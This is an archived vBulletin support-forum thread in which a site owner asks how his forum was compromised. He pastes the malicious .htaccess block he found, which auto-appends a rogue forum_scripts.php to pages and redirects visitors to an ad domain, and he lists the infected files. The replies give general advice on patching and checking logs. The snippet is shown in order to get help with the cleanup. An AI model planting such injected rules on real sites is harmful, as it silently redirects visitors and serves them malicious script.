Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
Reload this Page URL htaccess Hacking
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 10-20-2013, 05:25 PM
tomtom1984 tomtom1984 is offline
 
Join Date: Jan 2013
Posts: 38
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default URL htaccess Hacking
Hi,

my page was hackt. Vbseo.com was no longer accessible at this time.
I have mapped the shorter the code here once. In the forum_scripts.php was referring to a google site with the js virus.
How could this happen? My Content relevant settings were not saved? How can I prevent it?



#########rataman##########
<FilesMatch ".(php|html|phtml|shtml)$">
php_value auto_append_file forum_scripts.php
</FilesMatch>
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://tastyads.biz/ts/wmid?Grand [L,R=302]
#########!rataman!#########


infected files:
updata.php
.htaccess
forum_scripts.php

--------------- Added [DATE]1382299320[/DATE] at [TIME]1382299320[/TIME] ---------------

xss ?
Reply With Quote
  #2  
Old 10-21-2013, 11:42 PM
tbworld tbworld is offline
 
Join Date: Oct 2008
Posts: 2,126
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I am guessing you have secured your board via the latest recommendations. If so, your next best bet is to examine your server logs and back-trace the operation. There is always evidence.

Please make sure you have read about the current exploits and their fixes at vbulletin.com (announcements).

If you were currently hacked, make sure you follow the recommendations.
https://vborg.vbsupport.ru/showthrea...26#post2448326

Sorry you were hacked.
Reply With Quote
  #3  
Old 10-22-2013, 12:10 AM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
  
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Also, make sure ANY AND ALL other software you are running is also kept up-to-date and secure. Rough example - if you are running an outdated version of let's say... hmm OpenX for ads/banners and it is outdated, then yes they can hack that and depending on how they hack it could potentially upload shell scripts or other and then subsequently hack into your forum.

The main thing to note here is: "I own so and so website, I must make sure I keep ALL software up to date, it is my responsibility to know these things and maintain secure software at all times" etc etc
Reply With Quote
Благодарность от:
tbworld
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 06:16 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03209 seconds
  • Memory Usage 2,179KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (3)post_thanks_box
  • (1)post_thanks_box_bit
  • (3)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (3)post_thanks_postbit_info
  • (3)postbit
  • (3)postbit_onlinestatus
  • (3)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete